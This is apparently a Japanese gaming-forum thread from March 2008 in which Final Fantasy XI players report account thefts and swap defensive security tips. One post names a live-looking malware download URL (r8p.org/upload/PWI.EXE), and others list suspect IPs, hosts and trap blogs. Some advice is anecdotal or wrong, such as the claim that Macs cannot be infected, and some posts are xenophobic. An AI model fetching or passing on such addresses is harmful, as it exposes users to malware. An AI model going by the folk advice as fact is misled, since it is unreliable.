とりあえず俺もHDD24時間稼働で1年経つし寿命ついでにOS再インスコしよう

そういえばHDD生産出荷段階で中華がウィルス仕込んでた事件もあったよなぁ……
184既にその名前は使われています:2008/03/24(月) 14:47:10.45 ID:WdMLKCJz
ほんっとにロクなもん混入しねえなあいつらwww
185既にその名前は使われています:2008/03/24(月) 14:53:21.20 ID:sI0/2XTk
「中国 混入」でググったら

予想を遥かに超えていた
186既にその名前は使われています:2008/03/24(月) 14:56:30.58 ID:Httpif6H
俺のIDもウィルススキャンしてくだしあ;
187既にその名前は使われています:2008/03/24(月) 15:02:06.20 ID:sV5MTkg6
俺の肛門もハックされそうだ!
188既にその名前は使われています:2008/03/24(月) 15:02:26.35 ID:sI0/2XTk
>>186
>>186
>>186

なにIDにURLとか貼ってるわけ?今時誰も踏まねーよプgr
189既にその名前は使われています:2008/03/24(月) 15:03:52.97 ID:8jcNID1A
ドリコムに作られた罠サイトを連絡フォームで通報した
先ほど、閲覧制限を掛けたとメールで連絡が来た

http://ff11xicng●blog●drecom●jp/
http://ff11hdiw●blog●drecom●jp/
閲覧制限確認
190既にその名前は使われています:2008/03/24(月) 15:15:39.10 ID:zZKH+Aj5
しかし10年前とかは輸出食品が劣悪ということはなかったんだよな
人増えすぎるとよくないな
191既にその名前は使われています:2008/03/24(月) 15:31:47.67 ID:+jpHHFib
>>95
そもそもMacはウイルスやマルウェアに
事実上感染しないんだから必要ないんだが。
192既にその名前は使われています:2008/03/24(月) 15:38:27.74 ID:+jpHHFib
>>148
おれも最近2回垢ハックされた口だが、
(2回目はログイン中のハックだったので
 ログイン合戦を繰り返して追い返してやったが)
1回目のときは30万ギルもため込んでいたギルも盗まれず、
ただ、闇杖だの光杖だのを競売に出せていただけだった。
あとそのメインキャラは削除されず、倉庫キャラを削除され、
その空いたスロットを使って別のサーバに新規キャラをつくられていた。
その新規キャラで試しにログインしてみると、
まるで普通のユーザーが普通のレベルあげなどをしていた形跡が
残っており、とても業者とは思えなかった。

ちなみに2回垢ハックされてから、
このスレにも書かれていた通り
・自動ログイン設定を解除する
・パスワードを変更する
・パスワードは毎回「スクリーンキーボード」を使って手入力
これを実行するようにしている。
それいらい垢ハックされていない。
193既にその名前は使われています:2008/03/24(月) 15:39:32.08 ID:RgZ1LaTX
>>191
数年前にやってたMacのTVCM思い出したよ。

「Macはウィルスに感染しないんだ!」って奴。
相手にされてないだけだろ、とテレビに向かって突っ込んだ記憶があるw
194既にその名前は使われています:2008/03/24(月) 15:41:14.29 ID:+jpHHFib
>>162
おお、同士よw
俺の場合はログイン合戦を延々と20分くらい繰り返し、
相手があきらめてくれたようだ。
その後速効で
・自動ログイン設定を解除し
・パスワードを変更し
・以後、パスワードは毎回「スクリーンキーボード」でクリック入浴してログインしている
これで無問題。
195既にその名前は使われています:2008/03/24(月) 15:42:23.89 ID:Q/ktx4QO
>>193
相手にしなさんな(´д`)
196既にその名前は使われています:2008/03/24(月) 15:44:19.68 ID:+jpHHFib
>>193
理由は「マイナーだからウイルス作者は誰も相手にしてない」
というだけ。これはあまりにも有名なことなのでいちいち繰り返すな。
どういう理由であれ、
「M acは(ウイルスが存在しないので)感染しない」という事実は事実。

日本は防衛力が高いわけでは決してない。
むしろイラクの方は防衛力は上だろう。
だけど、被害が多いのはイラクの方。
それは、日本がテロに相手にされてないだけ。
197既にその名前は使われています:2008/03/24(月) 15:45:03.69 ID:Q/ktx4QO
>>194
>入浴して
マウスだかコントローラだかを行水させちゃまずいだろw
198既にその名前は使われています:2008/03/24(月) 15:48:04.35 ID:gNFuY07B
烏の行水ならぬ鼠の行水・・・
【サンダー】【ショック】【気をつけてください。】
199既にその名前は使われています:2008/03/24(月) 15:51:14.37 ID:vtt50urT
>>196
わざわざNG避けに「M ac」なんて
Mとacの間にスペース入れて煽るのは感心せんな。
ジョブズ復帰以降(iMac、OSX以降)、およびiPodヒット以降ユーザが増加し
おかげでウイルスも増えてることぐらいわかってるだろ?
200既にその名前は使われています:2008/03/24(月) 15:58:21.63 ID:xrdpbYwi
>>199
煽ってるの判ってるならスルーしれ。
いつも沸いてる既知外だろ。
201既にその名前は使われています:2008/03/24(月) 16:00:56.88 ID:+jpHHFib
>>199
そうだね。Ma cユーザーが急増しているのに比例して
せっかくのMaacのクリーンな環境が崩れようとしているのは確かだね。
まぁしかしまだまだマイナーには変わりないんで、
実害が出るほどウイルスが増えることはないと思うよ。
202既にその名前は使われています:2008/03/24(月) 16:08:00.40 ID:UwqirNKw
なんつうか、防衛対策まともにとれないなら
PCでオンラインゲームやらないほうが良いのね 不安だからPSのほうにして正解だったぜい
203既にその名前は使われています:2008/03/24(月) 16:14:33.20 ID:+JYA+CIb
専ブラでID抽出するとテラワロスw
204既にその名前は使われています:2008/03/24(月) 16:14:57.46 ID:uo1cC9cX
パス変更した時に、盗まれるってのは、ある?
205既にその名前は使われています:2008/03/24(月) 16:18:28.67 ID:TvxgTMvM
>>204
すでにキーロガーが仕込まれていたら、ありうる。
だが、現状で大流行している垢ハック用マルウェアの99%以上が
キーロガータイプではなく、パスワード保存ファイルを直接
盗んでいくタイプなので、垢ハックサイトを踏んだ可能性があるなら
直ちに>>194の方法で変更するのが吉。
206既にその名前は使われています:2008/03/24(月) 16:50:57.84 ID:vtt50urT
>>205
> 99%以上が キーロガータイプではなく、
>パスワード保存ファイルを直接 盗んでいくタイプ

断言するのは危険。Winsock2のLSPにくっついてパケットキャプチャする
(保存していようが手入力しようが関係無い)タイプはずいぶん前から投入されている
(リネージュ等のネトゲアカウントハックにも、それ以外にも広く使われている)。
ttp://www.mcafee.com/japan/security/virG2007.asp?v=Generic%20LSP
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=jp-210538
ちなみにこのタイプは手動で該当ファイルを削除すると
通信不能になって涙目になったりする。
207既にその名前は使われています:2008/03/24(月) 16:52:59.19 ID:vtt50urT
キーロガー型が現状少ないのはそのとおり。
余談としてROではスクリーンキーボード(ATM等によくある配列バラバラのテンキー)に
マウスで鍵を入力する仕組みがあるんだが、実は東南アジア(フィリピンだったかな)のROで
先にこの方式を採用し、速攻で画面ごと動画キャプチャするステキなトロイも出ていた
(のでBOTNEWSなどでは「いまさら…」感があった)。
208既にその名前は使われています:2008/03/24(月) 17:09:06.90 ID:C2NTmBz4
夕べからこのスレ参考にして自分のPCにNoScriptとPeerGuardian導入
したんだけど、さっき親のPC起動したらWindowsのFirewallが有効に
ならなくなってビビッタ。
どっちのPCもOSはXP SP2でルータに無線LANで繋いでて、ウィルス対策は
Avast&Spybotなんだけど、自分のPC弄ったせいで親のPCに不具合が
起こるなんて事ってある?
一応、親のPCはシステムの復元で数日前に戻したらFirewallは有効に
できて、今Avastでスキャン中。
209既にその名前は使われています:2008/03/24(月) 17:21:09.00 ID:vtt50urT
原理的には可能だけど、まずないと思う。
210既にその名前は使われています:2008/03/24(月) 17:22:32.78 ID:Q/ktx4QO
>>208
妄想が豊かでうらやましいわw
211既にその名前は使われています:2008/03/24(月) 17:26:57.16 ID:C2NTmBz4
>>209
ですよねー。
>>210
あまりにもタイミングが良すぎで焦ったのよw
212既にその名前は使われています:2008/03/24(月) 17:34:35.33 ID:zErWARNN
UchinoLSの準はいじんwが
「垢ハック?あり得ねぇwww」
「される奴って馬鹿?w」
「FF専用PC用意すればいいのに馬鹿じゃねwww」
とか言ってた本人が垢ハックくらって所持金無くなってた上にキャラ削除までされてたんだとさ。
LS掲示板で騒いでた。
213既にその名前は使われています:2008/03/24(月) 17:35:58.73 ID:vtt50urT
FF専用PC用意してなかったんだね(´・ω・`)
214既にその名前は使われています:2008/03/24(月) 17:38:06.93 ID:zZKH+Aj5
>>212
自業自得だな
タル暗と同じレベルではずかしい
215既にその名前は使われています:2008/03/24(月) 17:42:19.74 ID:T6Wahbt1
垢ハックされたかもwwww
216既にその名前は使われています:2008/03/24(月) 17:46:25.63 ID:KodraVfX
垢ファックされた><
217既にその名前は使われています:2008/03/24(月) 17:53:18.88 ID:76dNoHqz
PG2インスコしたらFFも弾くんだなワロタ
218既にその名前は使われています:2008/03/24(月) 18:00:45.95 ID:Fm9VlWLZ
パスをスクリーンキーボードで入力したいんだけど
PCでスクリーンキーボードってどうやって出すんだっけ(;´д`)
219既にその名前は使われています:2008/03/24(月) 18:06:10.11 ID:vtt50urT
アクセサリのユーザー補助。
アプリの追加で入れないと無いかも。
220既にその名前は使われています:2008/03/24(月) 18:10:09.72 ID:HWQPHJQs
>>217
はじかねぇよw
221既にその名前は使われています:2008/03/24(月) 18:10:44.01 ID:Fm9VlWLZ
そうなのか! 
ありがとう入れてくるは
222既にその名前は使われています:2008/03/24(月) 18:22:05.69 ID:76dNoHqz
>>220
接続すらできなくなるよ
初心者の俺にはPS2がお似合いなのかw
223既にその名前は使われています:2008/03/24(月) 18:23:48.81 ID:mvpeqCeH
先日ハックされました、ノートン最新状態で無反応。
FF立ち上げたらインストールディスクを入れろと指示されFF開始できない
CDもってきたら普通に起動、しかしIDやパスを再入力する状態
そのままオンしてプレーし、翌朝またオンしようとしたら「パスが違います」wwwwwww
セカンド垢でオンしてサーチしたらハックされたキャラがジュノでうろちょろ・・・
GM呼んだけど30件待ち、コールセンターは朝早くて留守番電話
やっとGM来てキャラを即停止してもらい本人確認後キャラ返還
ギルや高額アイテムは一切無しの状態でした
ウイルスソフトで再サーチ+FFをインスコ
だけどオンするときにパスが消えていてまたCD入れろとなるのでウイルス削除不可と判断
HDを初期化し終結・・・・・・

GM曰く、半年くらいたったら垢ハックしたときに店売りされている物だけは返還するとのこと、
ということは何も戻ってこないということじゃんwwwwwww

不審なサイトやDLをしていないので、スパイウエァ混入の経路不明・・・・・・
GMに警察に届けろと言われたが、ギルもアイテムも戻らないのに意味ねぇ!!
224既にその名前は使われています:2008/03/24(月) 18:27:19.70 ID:lMomuAcj
>>222
前スレで詳しくわかんないならP2Pを許可するにしる
とか見たきがする
225既にその名前は使われています:2008/03/24(月) 18:29:27.04 ID:8bfKIyLi
いい加減、公式のトップページで注意喚起を促す文章載せろよクソエニ
226既にその名前は使われています:2008/03/24(月) 18:30:54.19 ID:zZKH+Aj5
>>223
ネットカフェは利用してないだろうな?
してたら間違いなくそこだ
227既にその名前は使われています:2008/03/24(月) 18:31:17.01 ID:+JYA+CIb
>>222
PG2 FFXI でぐぐれば幸せになれる
228既にその名前は使われています:2008/03/24(月) 18:31:35.14 ID:f8U+hHlG
インしたら数行垂れ流すだけでも随分違うのにな
229既にその名前は使われています:2008/03/24(月) 18:34:27.81 ID:uo1cC9cX
もう誰かが、シャウトで、伝えるて問題を大きくするしかないな
230既にその名前は使われています:2008/03/24(月) 18:45:05.56 ID:lMomuAcj
>>226
オチケツ、ネットカフェ使っても自宅PCのFFがCD入れろなんて言わないだろう。
きっと改ざんされたHPからトロイ入れられたんじゃないだろうか。
231既にその名前は使われています:2008/03/24(月) 18:51:29.02 ID:ExAbIYmH
http://www.playonline.com/ff11/polnews/news12892.shtml
何か対応してくれる!? わけねーかw
232既にその名前は使われています:2008/03/24(月) 19:02:15.55 ID:vQXYTLxz
>>223
ギルやアイテムが戻らなくても業者に鉄槌が落ちるかもしれない。
233既にその名前は使われています:2008/03/24(月) 19:04:25.59 ID:QdOH9ZPy
韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?
234既にその名前は使われています:2008/03/24(月) 19:05:52.25 ID:zZKH+Aj5
ttp://www.playonline.com/ff11/rule/imgs/impb.jpg

したのうはは表情ふざけてんのか
235既にその名前は使われています:2008/03/24(月) 19:06:50.04 ID:zZKH+Aj5
>>233
それ新手の罠か?
236既にその名前は使われています:2008/03/24(月) 19:08:48.26 ID:+JYA+CIb
とりあえず、書き込んだあとに自分のID確認してみような
237既にその名前は使われています:2008/03/24(月) 19:16:24.20 ID:0G3UgKbW
Temporary Internet Filesの中の1つのファイルが 感染: Trojan-Downloader.VBS.Small.gn
と診断されました
マカフィーがを使っていて、このファイルを踏んだ時反応して遮断されてはいたのですが
最近の騒ぎで、初めてカスペオンラインスキャンを行ったところ、引っかかりました
そのままカスペの試用版で消すには、今使ってるセキュリティソフトを消せと言われたので実行しませんでしたが
このファイルを踏んでから何度も行ってるマカフィーのチェックでは引っかかりません
中身は、ハックスレ11で報告されている r8p.org/upload/PWI.EXE をDLするスクリプトです
ほかに検出されたものはないので、危険性のあるファイルだけど実効はされてないということでしょうか?
削除は、このテンポラリファイルを削除するだけで大丈夫でしょうか?
238既にその名前は使われています:2008/03/24(月) 19:20:12.37 ID:4CoULjpF
POLに適当なIDとパス入れた状態でアカハックさせればよくね
239既にその名前は使われています:2008/03/24(月) 19:21:31.66 ID:8jcNID1A
>>233
Windows XPを使ってるとして、
%SytemRoot%\system32(例:C:\WINDOWS\system32)に tracerts.exe が
あったらトロイに感染してる
Windows標準コマンドのtracert.exeやtracert6.exeじゃなくてtracert“s”.exe
240既にその名前は使われています:2008/03/24(月) 19:43:53.89 ID:QdOH9ZPy
>>239
ありがとうございまs
tracert“s”.exeはありませんでした
PG2が真っ赤なログで不安すぎる・・・
241既にその名前は使われています:2008/03/24(月) 20:07:11.96 ID:Q/ktx4QO
>>237
>>29
過去ログ読め
242既にその名前は使われています:2008/03/24(月) 20:09:17.22 ID:AM88sWcX
マックでもアカハックされるの?マックにしようかなw
243既にその名前は使われています:2008/03/24(月) 20:14:02.64 ID:vznh5385
カスペルオンラインスキャナ走らせたのだが、結果のレポートのところで
感染オブジェクト名のところにずらーっとlogファイルやdatファイルが並んでて
ウィルス名のところに「ロックされています」て出てるのだが、これは何故?
244既にその名前は使われています:2008/03/24(月) 20:34:48.78 ID:+JYA+CIb
>>243
検査できませんでしたってログ
245既にその名前は使われています:2008/03/24(月) 20:37:12.64 ID:8jcNID1A
>>240
ごめん、言葉足らずだった
tracerts.exeが見つからなくてもAdwareかなんかが仕込まれているのは
ほぼ間違いない。いろいろなオンラインスキャナで調べたほうがいいです

>>243
ほかのプログラムが使用中で開けないか削除できないから
246既にその名前は使われています:2008/03/24(月) 20:49:03.81 ID:nqpgFFzc
今月のパス抜きで可能性あるのは3月上旬あたりと中旬以降に該当サイトにアクセスした人間全員?
アクセス数から考えて、
アクセスしたけどん抜かれてない人が大多数だと思うんだけど、
その辺を分けてるものはなんだろ。
windows Update最新だと感染しないとかなのかな。
247既にその名前は使われています:2008/03/24(月) 20:54:25.34 ID:kh97SrbK
>>246
・単純にセキュリティー製品(アンチウイルス系ソフトなど)が頑張って感染or漏洩を防いだ。
・感染しているが、漏洩の物理的チャンスがない。
・漏洩しているが、犯行者の手元にある情報があまりにも大量のため、悪用にまでは至っていない。

等々。
248既にその名前は使われています:2008/03/24(月) 20:55:46.56 ID:lzZx8A86
>>233
>韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?

58.227.193.190のアドレスから、一方的にアクセスされてるんだったら、
>>233の家のIPアドレスがが業者にばれてて、業者がセキュリティホールを探すために、
無差別でアクセスしてることもあると思う。
>>233のIPが動的IPなら、ルータ等を再起動するとかして、IPかえてみれば解決するかも。

逆に>>233のPCから、58.227.193.190へアクセスしてるなら、>>245氏の言うとおり
何か仕込まれてるのかも。
249既にその名前は使われています:2008/03/24(月) 20:58:51.08 ID:J6GiBSTn
>>233
ちょっと調べてみたが、韓国のスパムメール業者のIPらしいな。
なんかPCに入ってないか?
250既にその名前は使われています:2008/03/24(月) 21:50:03.03 ID:47bjLYLG
定期保守上げを。
251既にその名前は使われています:2008/03/24(月) 21:53:37.87 ID:UcF3Od6M
NOD32でも駆除できる?
252既にその名前は使われています:2008/03/24(月) 22:12:42.15 ID:QdOH9ZPy
Backdoor.Out Break  nk210-201-139-91.static.apol.com.tw
感染しまくりのようです orz
253既にその名前は使われています:2008/03/24(月) 22:14:23.47 ID:CHzqP0my
バハ鯖でまた垢ハック
254既にその名前は使われています:2008/03/24(月) 22:15:19.89 ID:hdKDzAOI
>>95
Mac用のPG2だけど英語版…
http://phoenixlabs.org/pgosx/
255既にその名前は使われています:2008/03/24(月) 22:28:28.26 ID:7DTVIQ6X
ネ実にわざわざ報告に来る人なんて被害者の100分の1くらいだろうし、実害数を考えると恐ろしい
さて本営は何時までだんまりを決め込むのやら
256既にその名前は使われています:2008/03/24(月) 22:31:14.88 ID:0jHdHBFL
業者対策へ本腰入れるのに3,4年掛かってるからな
1年後に対策したとしても、早いくらいだなw
257既にその名前は使われています:2008/03/24(月) 22:32:35.55 ID:tcfmCYoK
>>253
えぇ〜、人が多いとは言えそう立て続けに・・・しかも
土日狙いじゃないとか嘘クセー

事実なら相当数のID&Passのストックがあって嬉しい悲鳴を上げながら
サポセン閉まっているであろう時間内に捌こうという事だろうか?

んで時間的に日本の垢狙い撃ちッぽいな。
英語堪能で国際電話もいとわないならば海外サポセン試した方が良いかも?
スクエニの海外サポセンならチャット対応とかもあるかな?
258既にその名前は使われています:2008/03/24(月) 22:37:56.69 ID:pye7laJB
パスをスクリーンキーボードで打ち込むようにしたんだが、
流石に動画キャプチャーするようなスーパートロイはでてない・・・よな?
259既にその名前は使われています:2008/03/24(月) 22:39:07.41 ID:0U03pW8G
>>258
今のところFF11の垢ハックのためのものは出てない、と思いたい
260既にその名前は使われています:2008/03/24(月) 22:40:19.27 ID:pye7laJB
他のはあるのかよwwwwwww


恐ろしいな マジで
261既にその名前は使われています:2008/03/24(月) 22:40:43.61 ID:GcBBAZhm
原因究明・セキュリティの強化を
ttp://blog.fc2.com/forum/viewtopic.php?t=20829

FC2ユーザーフォーラムにスレが立った。
実際に被害に遭ったブログ主はここで経緯と状況を説明してもらえないだろうか。
第三者が伝聞で書き込みしていても意味が無い。
262既にその名前は使われています:2008/03/24(月) 22:59:32.30 ID:vtt50urT
>>251
無理。AntiVirならできる
263既にその名前は使われています:2008/03/24(月) 23:05:25.00 ID:tcfmCYoK
>>261
fc2ってだけでアクセスしたくないなw
264既にその名前は使われています:2008/03/24(月) 23:19:20.01 ID:Yd7XwcSP
ノートン2008+PeerGuardian2で韓国やら香港やら厨国蹴って
ZoneAlarmでファイアウォールを有効にして
パスは手打ちで9桁。ブラウザはSleipnir
WindowsUpdateは最新で不都合多いと噂のIE7?だけ入れてない

これでも抜かれるサイト踏んだらまず抜かれます?

ていうかPeerGuardian2入れてみてビビッタ
別件だろうけど香港と韓国から分刻みで進入してきてたのね・・・・

265既にその名前は使われています:2008/03/24(月) 23:25:51.11 ID:qfZn+dai
>>263
冗談抜きで同意するは
266既にその名前は使われています:2008/03/24(月) 23:32:02.13 ID:lzZx8A86
>>252
これかな。
http://spywaredetector.net/spyware_encyclopedia/Backdoor.Out%20Break.htm

残念だけど、バックドア仕込まれてたっぽいね。
FFと関係あるのかは不明だけど、>>249のスパム業者だったら、
スパムメールの送信端末とかにされてたのかも。

駆除するか、心配なら駆除した後でOSクリーンインストールして
おいたほうが安全だと思う。
267既にその名前は使われています:2008/03/24(月) 23:38:25.28 ID:vtt50urT
>>261
そこ見たらLineage Database(というFC2ブログ)も食われたらしいね。
268既にその名前は使われています:2008/03/24(月) 23:40:22.20 ID:ApBIgGA/
仕事から帰ってきたらPOLパスワード変えられてました。
フレにGM呼んでもらって待ってるとこですが、
自キャラがどうやらログインしてる模様です。
なんだかなぁ・・・。
269既にその名前は使われています:2008/03/24(月) 23:42:00.79 ID:We8pVkNe
>>268
アチャ・・・(ノ_< ;)
早くGM来て行動止めてもらえるといいな
270既にその名前は使われています:2008/03/24(月) 23:44:12.74 ID:+KW5+qyc
http://jbbs.livedoor.jp/game/21862/
尻鯖板は管理人自身が業者ということが判明している
いちおう張って置きますね
271既にその名前は使われています:2008/03/24(月) 23:44:47.78 ID:T6Wahbt1
>>215でハックされたかもって言ったものだけどマジデされてた。
装備がエクレア品以外全部売られてて所持金が雀の涙ほどになってた。
マジデショックって言うかなんだかなぁって感じになるね
272既にその名前は使われています:2008/03/24(月) 23:44:52.61 ID:tcfmCYoK
スクエニ様〜おねげぇデスじゃ〜24時間窓口作ってくだされぇ〜〜ッて感じだよね
273268:2008/03/24(月) 23:46:54.93 ID:ApBIgGA/
>>269
80件以上待ちだということです。
倉庫めぐりまでされてるとか。
なんというやるせなさw
フレが倉庫にtellで「GM呼んだ」的なことを言ったら
「Please」とかえってきたそうな。
返事するんだな・・・・
274既にその名前は使われています:2008/03/24(月) 23:48:54.82 ID:We8pVkNe
>>273
それムカツクな
暫定でもいいからしばらく窓口を24時間にしてほしい
275既にその名前は使われています:2008/03/24(月) 23:51:06.74 ID:rpE40Jdl
そういえば、前ここでハックされたって報告来てた人が、2垢でGMコール呼びながら
のっとられたキャラに英語でその垢返せって言ったら、これは貰っただか買った垢だって
英語(ピンイン混じってたきもするけど)で言い返してきたのもいたらしいですね
276既にその名前は使われています:2008/03/24(月) 23:53:57.19 ID:1ggkpLWR
>>274
もはやここ一週間で多数のキャラからアイテム9割以上(レアEX除く)を
受け取ったってだけで業者認定して垢禁&アイテム戻しでいいだろと思う。

一人からでも9割以上のアイテム移動はレアだからそれでひっかけられねーのかなぁ。
277既にその名前は使われています:2008/03/24(月) 23:56:33.23 ID:u0FcALPC
解約→FFアンインスコ
これが最大の防衛策に思えてきた

他のゲームならハックされたら公式HPでパスワード忘れた
→新パスワードがメールで送られてくる
→自分でログインしてINしてる業者落とす
→公式HPでパス再発行、ここでメール受け取らなきゃ安全
 OS再インスコ
これ24時間できたりするのよ

ハックされた人は面倒でもちゃんと警察に届けてね
届けないと□は「あなたが業者にパスとID教えた」
とみなすから
278既にその名前は使われています:2008/03/24(月) 23:57:04.89 ID:DyD4MS3I
久しぶりにログインしたらキャラが裸だったとか
今後続きそうだな
279既にその名前は使われています:2008/03/25(火) 00:00:11.53 ID:8jcNID1A
今月見つかったRealPlayerのActiveXコントロールの穴は
11.0.2でふさがったらしい
確証はないけど、今回の垢ハック騒動はこの穴も使われているかも

最新のRealPlayer 11.0.2でも1月に見つかった穴は残ったままみたいだから
アンインストール推奨だけどな
280既にその名前は使われています:2008/03/25(火) 00:01:19.87 ID:mx3cOLzk
>>268のフレです。
まだGM待ちです。
たぶん、GMじゃ役に立たないだろうけど、思いだけは伝えようかと。
281既にその名前は使われています:2008/03/25(火) 00:05:41.63 ID:N6twjFNK
>>280
ガンガレ!
あと早急に対策をしてほしいって念を押して下さい
毎日ハック報告を見るのは辛すぎる
282既にその名前は使われています:2008/03/25(火) 00:05:51.11 ID:r19OMXfd
今現在動いてる厨蚊がいるなら天安門事件なりなんなり、
そのあたりの言葉でログ埋め尽くしてやりたい気分だな。
その手の言葉、詳しくないからあまり知らないが・・・。
283既にその名前は使われています:2008/03/25(火) 00:05:58.27 ID:GeAvoS1Q
ブログも一切見て無いが、やっぱり怖いよな・・・
本当はとられてて、業者の処理が間に合わなくて、今は問題ないけど
そのうちとられたりするんじゃ無いかと思うと怖い・・・

284既にその名前は使われています:2008/03/25(火) 00:07:24.68 ID:WD+HwGs7
>>283
今すぐカスペルオンラインスキャナするんだ!
285既にその名前は使われています:2008/03/25(火) 00:08:09.82 ID:sGs0zFvT
バハ板も現在進行形でハック実況されてるなあ。
今回のメンテでなんとかして欲しいよ。
286既にその名前は使われています:2008/03/25(火) 00:08:16.82 ID:GeAvoS1Q
>>284
したよ。ノートン共に0
火狐でNoscriptも入れてる
287既にその名前は使われています:2008/03/25(火) 00:10:11.47 ID:j2GSQhJ6
白門でEでPT希望出してるKeycle
288既にその名前は使われています:2008/03/25(火) 00:10:28.66 ID:8nsrrYgI
PS2&箱ユーザーだけど、ここみて背筋が寒くなったので、POLにインする際に
メンバーパスワードを入れるようにしたよ。
289既にその名前は使われています:2008/03/25(火) 00:10:30.53 ID:WD+HwGs7
>>286
スキャナでトロイ出無いてことは、今は取られてないんじゃない?
290268:2008/03/25(火) 00:10:35.61 ID:HuadLiyJ
>>274
窓口くらいは対処してほしいですね。
何もできずに指をくわえてフレからの情報をきいてるだけってのは
ほんとやるせないです。

私が感染したと思われる状況を書いておくので
心当たりのある方は対策をとるほうがいいかもしれません。

ペコろぐ。を先週末も見ていました。(週に数回見てる)
昨日は正常にログイン。
今日、携帯でこのスレを知り、
帰ってウィルスチェックしてみようと思っていた矢先にこれです。

※ペコろぐ。様に害意はありません。
うちのサルLSはあそこなしではありえないくらい頼ってましたので。
291既にその名前は使われています:2008/03/25(火) 00:11:18.51 ID:g7f8T3fx
Realpleyerの穴ってリアルプレイヤインスコしてなかったら無関係?
俺最近PCかい直してRPそのまま入れてないんだけど。
292既にその名前は使われています:2008/03/25(火) 00:12:32.76 ID:ZVcNVdfz
専ブラで見たらレス数少ないクソスレ乱立しまくりだな
ネ実は24時間あげあげあげえええ
293既にその名前は使われています:2008/03/25(火) 00:12:33.76 ID:GeAvoS1Q
>>289
まぁ、ブログはまったく見て無いからねw
でも、何か怖いよね・・・・
まったく関係の無いHPにまで仕込まれたりしてたらどうにもならんし・・・

294268:2008/03/25(火) 00:14:14.08 ID:HuadLiyJ
>>280
さんくす!!
なんという掲示板の私的利用w

これ以上犠牲者を増やさないように
みなさんのフレにも告知してあげてください!
295既にその名前は使われています:2008/03/25(火) 00:15:12.22 ID:WD+HwGs7
>>293
今日このスレ初めて見て、怖くなったからPG2入れた。
FC2系のブログは当分見ないことにした。
無関係なHPまで改竄されたらどうしょうもないが、少しでも可能性減らすように
自衛するしかないよね・・・。
296既にその名前は使われています:2008/03/25(火) 00:17:52.26 ID:czdY66qa
>>291
インスコしてなければおk

Realplayerの代わりにReal Alternative入れている人も古いActiveXコントロールが
インスコされるので注意。
297既にその名前は使われています:2008/03/25(火) 00:18:43.66 ID:jhdd7oxY
バハ鯖で2日連続垢ハックwwwwww
被害者鯖スレに降臨中
298既にその名前は使われています:2008/03/25(火) 00:23:29.00 ID:nQ1aeD7W
取り合えずパスは用心して変えておいた
299既にその名前は使われています:2008/03/25(火) 00:24:20.68 ID:gAnYPalN
GMも垢ハック専用窓口を24時間体制で作れ!
自キャラがハックされてアイテムトレードしながらうろうろしているのを2時間も3時間もみてるだけってありえんだろ?!
サポセンの電話は昼間だけだし・・・・・・
300既にその名前は使われています:2008/03/25(火) 00:38:30.70 ID:ZVcNVdfz
俺ハックされたら鯖スレにキャラネーム晒してなんとかして助けてもらおうとするだろうなw
だって5年も育てたキャラなんだぜ・・・いきなり何もかも失うとか超嫌だ。
ホント自分必死すぎでキモイ。
301既にその名前は使われています:2008/03/25(火) 01:00:12.55 ID:omlW/ixG
>>300
だが昨日はそれで助かったのかもしれない
必死だと思うのはしかたなかろうw
302既にその名前は使われています:2008/03/25(火) 01:03:42.77 ID:wU4wL3FZ
POLシステムを改良するか、サポセン24時間をすぐやれ!!
303既にその名前は使われています:2008/03/25(火) 01:11:36.40 ID:f5GA3rVo
バハ鯖スレみてきたよ。
昨日といい今日といい、サポセン動いてない時間狙ってるんだろうなぁ。

同じ鯖の人がああいう状態になったら力になってあげようと思うよ、ほんとまじで。。

これからどんどんハックされる人でてくるんだろうなぁ、
有名ブログが改ざんされたわけだし。

まじで、業者ゆるせん
304既にその名前は使われています:2008/03/25(火) 01:17:32.63 ID:vFPHu9Hl
・サポセンの24時間サポート
・指定されたISP(IP)からのみログイン可
・パスワードなどのアカウント情報変更時に秘密の質問
・アカウント情報変更後にユーザーにメールで変更のお知らせ
・ログインメッセージ・公式サイトのトップページで注意喚起
・LSCへのログインをPOLは別のID・パスワードに変更

このくらいはやってもらわんと・・・てかサポセンの24時間サポート以外は
すぐ出来ると思うんだがな。 
それにしてもLSCなんてセキュリティ意識のある人間が作ったとは思えない仕様だな
・・・この辺NAに突っ込まれてたしスンヂ馬鹿すぎるだろ。


305既にその名前は使われています:2008/03/25(火) 01:18:08.85 ID:rMVWg75a
関わると危険だと言う意識が広まってしまうと、買い手が激減するだろうし
業者が自分で自分の首を絞めてるようにも思えるが・・・
こんなことが起きても、まだ買う奴なんているのかねぇ。
306既にその名前は使われています:2008/03/25(火) 01:23:18.89 ID:9f0lVnnD
PS2だけど、PCでLSコミュニティとか使ってたし
怖いからPOLのパスワード変えといたぜー。
これでもうLSコミュニティとか二度と使わなければ
一安心かな?まあでも定期的にパス変えよっと。
おそろしやおそろしや。
307既にその名前は使われています:2008/03/25(火) 01:25:00.75 ID:jhJ+BovV
>>305
自分は大丈夫。もしくはまた垢買うからいいんじゃね?
っていう思考じゃないかな
308既にその名前は使われています:2008/03/25(火) 01:25:11.33 ID:elGAe1vY
ここでの報告見てると
バハ鯖の人が多いのかなとか関係ないことを考えてしまうバハ民

前、救えネの洋ゲーやってたときはGMコールとか24時間対応で
返事から行動まですぐ対処してくれてたんだけどなー
もう、そこまで力入れてないってことなのか・・・

垢ハックなんてソフト開発側じゃある程度までしか出来ないだろうし
メンテがそれの対策ならいいんだけどね
個人のデータ管理とOS側に頼るんだろうなー
309既にその名前は使われています:2008/03/25(火) 01:25:25.04 ID:pm+l6zsS
ここが■の岐路だな。
きっちりとした対応や保証を打ち出せればアップ内容がクソとか目を瞑ってもいいぐらい評価されるはず。
が、今までの上から目線での適当な対応を続けるようなら遠からずFFは終るだろう。
次世代オンゲにも人が集まるわけは無い。
業者問題はネトゲやるならこれからもずっと付き纏うだろうからな…。
310既にその名前は使われています:2008/03/25(火) 01:27:04.26 ID:7ZgQEQ9q
赤ハックされてないが俺もバハ鯖民だ
まぁ俺はPS2だから大丈夫だとは思うけどな…
311280:2008/03/25(火) 01:31:21.14 ID:mx3cOLzk
280です。まだGMきません。
このシステムもいい加減にしてほしいですね。
メンテまで@30分。
こないで終わっちゃうかなぁ。
くやしいなぁ
312既にその名前は使われています:2008/03/25(火) 01:32:16.79 ID:9f0lVnnD
>>311
がんばれ!泣き寝入りだけはしてほしくない!
313既にその名前は使われています:2008/03/25(火) 01:35:42.94 ID:yV1jINTG
